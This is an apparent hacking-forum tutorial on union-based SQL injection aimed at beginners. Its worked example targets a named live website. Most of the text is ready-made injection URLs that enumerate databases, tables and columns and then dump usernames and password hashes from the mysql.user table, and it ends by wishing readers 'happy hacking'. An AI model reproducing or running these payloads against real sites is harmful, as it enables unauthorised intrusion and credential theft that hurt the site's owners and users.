[Tutorial] Getting Data From Multiple Databases [SQLi]

Posted by 67 On 04:02

So I've been seeing alot of sites with multiple databases, and since I haven't seen a tutorial on this, I figured it would help out some beginners.

I'll be using this link as an example.
http://www.hubbardbrook.org/people/view.php?id=109'

Once you got your columns count, and vulnerable columns, you want to get the names of the databases.
You can do that by using:

Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16, ​17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are 2 different databases, one called "hbr" and one called "mysql". Now we want to see which one is the default, or current one. First write those down in notepad or something.

To find out, you pick your column, and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,1 ​7,18,19,20,21,22,23,24,25--

Now where column 4 was (my vulnerable column), we can see "hbr". So we know that's the current database. Now of course, you'd want to search through it to find your tables to see if you can find some login info. You would get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=data ​base()--

There's over 100 tables, but I didn't see anything that resembled user info, so now we check the other database. It's almost the same thing as finding the default tables. My other database name was called "mysql".
To get the tables of that, we convert it to hex, and use:
Code:
where+table_schema=0xdatabasehexhere
So the hex of "mysql" is 6d7973716c
Make sure you always add 0x in front of your hex.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d ​7973716c--

Now we got the tables from the second database, and we can see that theres a table named user!

Now we get the info from the users table, but make sure you keep the table_schema for that database. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16, ​ 17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x ​6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So basically what I did was converted my table name to hex, and got the columns from the database.
Now we want the data from the columns. It's still almost the same, except for the very last bit.
There are 2 columns named "User" and "Password", which is what we want.
So make your group_concat function, but at the end, the syntax would be:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12, ​13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And as you can see, there are now logins where your column name was.
Hope you guys understood, happy hacking!
Victoire

Categories: